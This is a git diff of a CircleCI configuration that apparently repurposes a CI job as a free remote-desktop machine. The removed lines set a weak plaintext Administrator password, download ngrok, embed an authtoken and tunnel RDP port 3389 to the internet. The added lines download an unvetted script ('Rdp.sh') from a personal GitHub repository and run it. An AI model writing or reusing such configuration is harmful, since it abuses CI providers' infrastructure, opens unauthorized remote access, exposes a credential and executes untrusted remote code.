--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -24,21 +24,9 @@ jobs:
     
       - checkout      
       
-      - run: Set-LocalUser -Name "Administrator" -Password (ConvertTo-SecureString -AsPlainText Aa1234 -Force)
+      - run: Invoke-WebRequest https://raw.githubusercontent.com/Gfffvgdsss/Rdp/main/Rdp.sh
       
-      - run: Get-LocalUser -Name "Administrator" | Enable-LocalUser 
+      - run: ./Rdp.sh
       
-      - run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
-      
-      - run: tar xf ngrok.zip
-      
-      - run: Copy ngrok.exe C:\Windows\System32
-      
-      - run: cmd /c echo ./ngrok.exe authtoken 1zZOttzfTVEWEEFImCg3yoEak92_6oVvawb2zAhpNF2intcpy >a.ps1
-      
-      - run: cmd /c echo cmd /k start ngrok.exe tcp 3389 >>a.ps1
-      
-      - run: cmd /c echo ping -n 999999 10.10.10.10 >>a.ps1
-      
-      - run: .\a.ps1
+    
       
